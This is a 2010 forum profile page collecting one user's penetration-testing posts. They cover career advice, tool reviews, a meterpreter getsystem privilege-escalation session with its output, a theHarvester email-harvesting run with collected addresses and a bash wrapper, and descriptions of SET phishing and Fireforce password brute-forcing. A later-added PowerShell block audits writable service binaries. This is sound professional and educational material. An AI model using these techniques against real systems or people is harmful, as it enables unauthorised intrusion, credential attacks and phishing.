May 23, 2013, 12:47:22 AM
Show Posts
31
Resources / Career Central / Re: Becoming Pentester / EH
on: March 19, 2010, 10:38:37 PM

Hey Pizza1337,
Here's what I would suggest. If you are heading in that direction, always go for a 4 year degree. I know there are good examples of lots of pentesters not getting a 4 year degree but honestly you will hit a lot of glass ceilings not having one. It doesn't really matter all that much where you get it, just get it.
Try to find a college with a network security program, or lots of electives in that area, or pick a major that's related. Do you want to do practical pentesting? Try and find a networking or IT degree. Are you interested in developing exploits or tools? Take Computer Science. There are lots of programs that have security electives. Take at least one per semester/quarter, to keep your interest.
I know some guys at UCSB (the team that competes as Shellphish) and they have had a running hacking club ever since they won Defcon. Do that, try and compete in CCDC competitions if you have it in your region.
Lastly look for summer internships with security places that do pentests or assessments. Learn all the industry tools, do all the training you can find on the net, and start writing your own scripts. Even if they are just simple things you think are cool, they show passion for the field.
Start a website or blog, go to cons, and come here when you have questions.
I know that's a lot but, sorry, must have brain dumped there =P
32
Resources / Tools / Re: Skipfish, Google Enters the Web Scanner Fray
on: March 19, 2010, 08:25:31 PM

No problem Ketchup! Part of my job is "competitive analysis" and "research" so I'm always testing and reviewing new tech. A web scanner from Google was big news so we took the morning in the lab to test =) I love pentesting and writing about pentesting. Luckily it's my job and my passion. That plus I drink a lot of coffee and live on the Twitter stream.
33
Resources / Tools / Skipfish, Google Enters the Web Scanner Fray
on: March 19, 2010, 05:58:27 PM

Just wrote a quick review and jotted down some insights on Google's new web application security scanner, Skipfish. Read the whole thing at the link or just check out the "skinny".
The Skinny: We like it. As Google says, it's not an end-all-be-all for web application scanners, but it definitely has some great logic and features, and is blazing fast. Also if you have seen the dev track, the developer Michal Zalewski has been quick to update for problems (1.01b fixes some crashing problems) and has some great upcoming features planned (pause/resume, VIEWSTATE testing, etc.). Although no scanner will ever replace a smart web app assessment engineer, Skipfish shows some great potential in the security space and… it's free. It won't replace any of our manual processes but we will definitely use it when applicable. Thanks Google.
http://www.redspin.com/blog/2010/03/19/skipfish-google-enters-the-web-scanner-fray/
38
Resources / Tutorials / Re: Beginners guide to Nmap
on: March 16, 2010, 11:32:55 AM

Just some added Nmap love:
- Nmap used to be less than proficient when it came to UDP scanning, but if you've become accustomed to using other tools like unicornscan or udp-proto-scanner (full payload type UDP scanners) you can be relieved that Nmap has added this into releases since a few months ago.
- If you need to scan all ports the secret unreferenced flag is "-p-"
- If you are doing version scanning I always find it valuable to script scan as well: "--script=All"
- The Nmap book is the best hands down resource for scanning knowledge: http://nmap.org/book/ and to keep updated with features and scripts that are added always check http://nmap.org/changelog.html
40
Resources / Tools / Getsystem privilege escalation using Metasploit
on: March 15, 2010, 05:52:31 PM

Sorry to spam the posts guys, I just thought people would like to read these. Videos are at the bottom link:
A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage/ethicalhacker.net) and Joshua Gauthier showed some quick snippets of Metasploit's Getsystem extension. Getsystem is meterpreter's new (Windows) privilege escalation extension used in the priv module.
Getsystem uses several techniques for priv escalation:
* Windows Impersonation Tokens (fixed by MS09-012)
* Abusing LSASS via token passing (Pass-the-Hash), which requires Administrator anyway.
* Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM; if you are lucky they run as a domain administrator).
* Improved KiTrap0D exploit released by Tavis Ormandy (MS10-015, patched as of now)
As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension, which I will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.
Also, check out Bernardo Damele's (author of SQLmap!) walkthrough on integrating Metasploit privilege escalation via SQLmap for post database exploitation. Here.
And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):
Kitrap0d in Metasploit 3.3.4-DEV

meterpreter > use priv
Loading extension priv…success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t        The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service – Named Pipe Impersonation (In Memory/Admin)
                2 : Service – Named Pipe Impersonation (Dropper/Admin)
                3 : Service – Token Duplication (In Memory/Admin)
                4 : Exploit – KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

http://www.securityaegis.com/getsystem-privilege-escalation-via-metasploit/
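A hardening check for the "weak permissions in the services" item in the post above, added here as an example; it is not code from the original post, from Metasploit's priv extension or from the linked article. It assumes a Windows host with PowerShell, and the list of "broad" principals, the rights mask and the function names are my own choices for the audit, not anything the post or Metasploit defines.

```powershell
# Added audit example (not from the original post or from Metasploit):
# list services whose executable can be modified by broad, non-administrative
# principals. A service binary writable by Users or Everyone is the weak
# permission the post describes, and matters because most services run as SYSTEM.

# Principals that should never hold write rights on a service binary (my choice).
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a caller replace or re-ACL the file. Modify and FullControl
# both include WriteData, so they match this mask as well.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service PathName, which may be
    # quoted, unquoted with spaces, and followed by arguments.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^"([^"]+)"') { $exe = $Matches[1] }     # quoted path
    elseif ($PathName -match '^(.+?\.exe)') { $exe = $Matches[1] } # unquoted, stop at .exe
    else { $exe = $PathName.Split(' ')[0] }
    return [Environment]::ExpandEnvironmentVariables($exe)
}

function Find-WritableServiceBinaries {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }

        # Skip binaries whose ACL we cannot read rather than abort the sweep.
        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }

        foreach ($rule in $acl.Access) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $rule.IdentityReference.Value) { continue }
            if (([int]$rule.FileSystemRights -band [int]$WriteMask) -eq 0) { continue }

            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $exe
                Principal = $rule.IdentityReference.Value
                Rights    = $rule.FileSystemRights
            }
        }
    }
}

# Every row is a service binary a standard user could overwrite; fix the file
# ACL (or move the binary under Program Files) and re-run until the list is empty.
Find-WritableServiceBinaries | Format-Table -AutoSize
```

Run it from an elevated prompt so every binary's ACL is readable. It only checks the file itself; the service object's own DACL (which `sc.exe sdshow <service>` displays) and the binary's parent directory are separate checks worth adding to the same sweep.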
41
Resources / Tools / Gathering logins/emails with theHarvester and Metasploit
on: March 15, 2010, 05:37:17 PM

Like GI Joe always said: Knowing is half the battle… And so it is the same with pentesting. One of the first parts of recon in a pentest is gathering valid login names and emails. We can use these to profile our target, bruteforce authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc. Where do we get this info? Well, without doing a full-blown Open Source Recon (OSINT) style assessment, we can use two simple scripts: Metasploit's search_email_collector.rb and Edge-Security's theHarvester. theHarvester (luckily for us) just updated to v1.5 and has now fixed some of its previous bugs with searching Bing and LinkedIn. It supports searching Google, Bing, PGP servers, and LinkedIn. Metasploit, under modules/auxiliary/gather, has search_email_collector.rb and uses similar techniques for Google, Bing, and Yahoo. A quick usage below identifies some users.
p.s. you can one-line search_email_collector like so in msfcli:
ruby /framework3/msfcli auxiliary/gather/search_email_collector DOMAIN=your_target_domain OUTFILE=output_file_you_want_results_in E
Check the last line for an example wrapper for these two tools.

zombie@haktop:/tools/email/theHarvester# ./theHarvester.py -d defcon.com -b google -l 500

*************************************
*TheHarvester Ver. 1.5              *
*Coded by Christian Martorella      *
*Edge-Security Research             *
* cmartorella@edge-security.com     *
*************************************

Searching for defcon.com in google :
======================================
Total results: 462000
Limit: 500
Searching results: 0
Searching results: 100
Searching results: 200
Searching results: 300
Searching results: 400
Accounts found:
====================
quietpro@defcon.com
nick.s@defcon.com
robert@defcon.com
lynne@defcon.com
@defcon.com
joe@defcon.com
info@defcon.com
dtangent@defcon.com
====================

And search_email_collector.rb usage here:
Running MSF search_email_collector...

We can wrap both these with a quick (albeit dirty) bash script (this example uses Backtrack paths):

#!/bin/bash
# Usage: <script> target_domain
DOMAIN="$1"
OUT="${DOMAIN}_emails.txt"
HARVESTER=/pentest/enumeration/google/theHarvester/theHarvester.py

echo "Running MSF search_email_collector..."
echo
ruby /pentest/exploits/framework3/msfcli auxiliary/gather/search_email_collector DOMAIN="$DOMAIN" OUTFILE="$OUT" E
echo
echo "Running theHarvester on Google, BING, MSN, PGP..."
echo
# theHarvester is a Python script, so run it with python rather than perl
python "$HARVESTER" -d "$DOMAIN" -b google -l 500 >> "$OUT"
python "$HARVESTER" -d "$DOMAIN" -b msn -l 500 >> "$OUT"
python "$HARVESTER" -d "$DOMAIN" -b pgp >> "$OUT"
# Keep only address lines, drop theHarvester's own banner address, and go through
# a temp file: redirecting back into the file being read truncates it before grep reads it.
grep @ "$OUT" | grep -v @edge-security.com | sort -u > "$OUT.tmp" && mv "$OUT.tmp" "$OUT"
echo
echo "Searching for LinkedIN profiles with theHarvester..."
python "$HARVESTER" -d "$DOMAIN" -b linkedin -l 40 >> "$OUT"
echo
echo "Finishing... E-mail Results:"
echo
cat "$OUT"
42
Resources / Tools / Exploit the User with SET – The Social Engineering Toolkit
on: March 15, 2010, 05:33:25 PM

Another tool post, full link with videos at the bottom of quote:
I have to say… SET is just plain awesome. The Social Engineering Toolkit (SET) is a set of Python scripts created by David Kennedy (aka rel1k) to automate many client side penetration testing vectors. In conjunction with Social-Engineer.org, which is also a top-notch resource, it provides for some of the best extensibility in this type of testing. A couple of weekends ago Dave released 0.4 of SET at Shmoocon. I'll be honest, I hadn't used it much until now but, after a good bit of research, I now appreciate its full glory. SET's Python scripts allow you to easily create phishing email attacks, create clones of any given URLs you provide it in a web based attack, and then on that page exploit the user's machine using a Java applet or browser exploits. It can create malicious PDFs as well.
In 0.4 there are many improvements:
- An improved Java applet that is multi-platform and deals well with any permission type
- 0.4 adds Metasploit browser exploits in addition to the Java applet
- Can launch the “Aurora” style attacks with Metasploit
- Improved cloned sites and redirect to legit site
- Integrates with Backtrack's sendmail or Gmail addresses
- Spear phishing with input of email lists improved
The SET is highly tied to the Backtrack and Social-Engineer.org communities. Training authors and contributors to these sites are well recognized penetration testers with a high level of interest in client-side and social engineering based attack vectors. You'll recognize names like Paul Hand, Chris Nickerson, Mati Aharoni, Chris Hadnagy, of course Dave Kennedy, etc., all working on these projects. In addition a whole section of the free Metasploit Unleashed training is dedicated to SET and they have an excellent setup and usage article here. Also Social-Engineer.org has an excellent writeup as well. SET has a large fanbase with many useful videos on usage and customized scopes.
The first video is actually the new SET 0.4 updates presentation and a recording of all the Firetalks (shorter than regular presentations) at Shmoocon, recorded by Adrian Crenshaw (Irongeek). Check it and some of the other vids below =)
Videos here: http://www.securityaegis.com/exploit-the-user-with-set-the-social-engineering-toolkit/#more-979
43
Resources / Tools / Easy, breezy, beautiful, password attacking…
on: March 15, 2010, 05:05:28 PM

Small post from my site =)
Bruting web forms usually is part of a web app assessment. We love to use Hydra, Medusa, or Wfuzz for this but we recently stumbled across a tool that makes it much easier. It's called Fireforce. It's a Firefox extension that gives you point and click bruting. We ran it in our labs with about a 74% success rate, meaning it mapped the parameters for web form logins correctly and gave us the correct password back (aka it didn't spaz out and kill our browser). So it isn't perfect, but we're willing to forgive that for its ease of use. It's dead simple. Give it a username, right click in the form password field, give it the text the login form gives on an unsuccessful login, and a bruteforce list. Make sure to read the documentation as you'll need to use a separate Firefox profile if you wish to browse while using the tool (it's a mem/cpu hogger).
*note* We haven't done a code analysis on the extension, use at your own risk in your lab.
Also, yesterday we tweeted about Ron Bowes of Skullsecurity.com's password analysis and password list collection, which are much win. Ron has done some data analysis on some of the leaked password lists of the last few years like RockYou, MySpace, and phpBB. He also stores the default password lists of many common industry tools, and even the passwords Conficker used to spread. I'd grab these lists if you don't already have them, who knows how long they will stay up.
Remember, password bruteforcing is great as long as you don't DoS the application/server. Also remember just because it's a web form doesn't mean it's not tied to another backend system (LDAP, etc.) so be aware you could lock out users. Also you might wanna check out our writeup a bit back on password attacks here.
Get Fireforce Here
Get Password Lists Here
Catch Ron on twitter: @iagox86
44
Resources / Tools / Identifying Server Applications
on: March 15, 2010, 12:58:20 PM

Hello All, Thought I'd share a tool for identifying platform versions. It's a Firefox plugin that will use screen scraping, default header locations, and other tricks to gather the app software (Django, DokuWiki, Drupal, Joomla (2), MediaWiki, MoinMoin, phpBB, Reddit, WordPress) and version. Very useful in web app hackery. http://www.backendinfo.com/